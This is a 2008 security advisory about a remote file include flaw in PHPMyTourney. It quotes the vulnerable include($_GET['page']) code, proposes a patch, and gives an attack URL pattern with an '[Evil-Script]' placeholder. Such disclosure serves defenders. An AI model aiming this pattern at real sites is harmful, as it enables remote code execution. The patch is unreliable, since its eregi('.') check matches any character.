Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Centreon <= 1.4.2.3  (index.php) Remote File Disclosure

XSS on XRMS- open source CRM

PR07-41: XSS on Juniper Networks Secure Access 2000

123 Flash Chat Module for phpBB

From:	HACKERS PAL <security_(at)_soqor.net>
Date:	29.02.2008
Subject:	PHPMyTourney Remote file include Vulnerability

Hello

PHPMyTourney Remote file include Vulnerability

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

home page : http://phpmytourney.sourceforge.net

Script : PHPMyTourney


vulnerable file : phpmytourney/sources/tourney/index.php

code
        $page = $_GET['page'];
        if(isset($page))
           include($page . '.php');
        else
           echo("must specify a page ");
lines 45-49

fast solution
replace with

if(file_exists($page . '.php') and !eregi(".",$page) and !eregi(":",$page) and !eregi("/",$page))
{
           include($page . '.php');
}
else
{
           echo("must specify a page ");
}

phpmytourney/sources/tourney/index.php?page=[Evil-Script]



#WwW.SoQoR.NeT